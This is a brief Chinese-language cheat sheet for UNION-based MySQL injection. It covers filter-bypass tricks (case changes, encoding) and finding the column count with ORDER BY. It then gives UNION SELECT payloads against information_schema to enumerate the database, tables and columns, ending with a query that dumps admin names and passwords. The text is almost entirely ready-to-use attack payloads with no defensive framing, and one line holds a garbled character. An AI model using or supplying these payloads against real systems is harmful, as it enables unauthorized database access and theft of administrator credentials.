Mysql注入详解 1.防注入绕过:1.大小写绕过 2. �编码绕过 2.判断多少列:order by xx 3.爆出数据类型不匹配的列:id=-294 UNION SELECT 1,2,3,4,5,6,7,8,9 from information_schema.tables 4.获取基本信息: database():数据库名 version():数据库版本 user():数据库用户 @@version_compile_os:操作系统 例:UNION SELECT 1,user(),3,4,5,6,7,8 5.获取表名 union select 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables where table_schema=0x(数据库名的16进制)
6.指定表名获取该表名下的所有列名: union select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_name=0x(表名的16进制) 7.获取指定列名下的数据: union select 1,group_concat(name,0x5c,adminpass),3,4,5,6,7,8 from admin
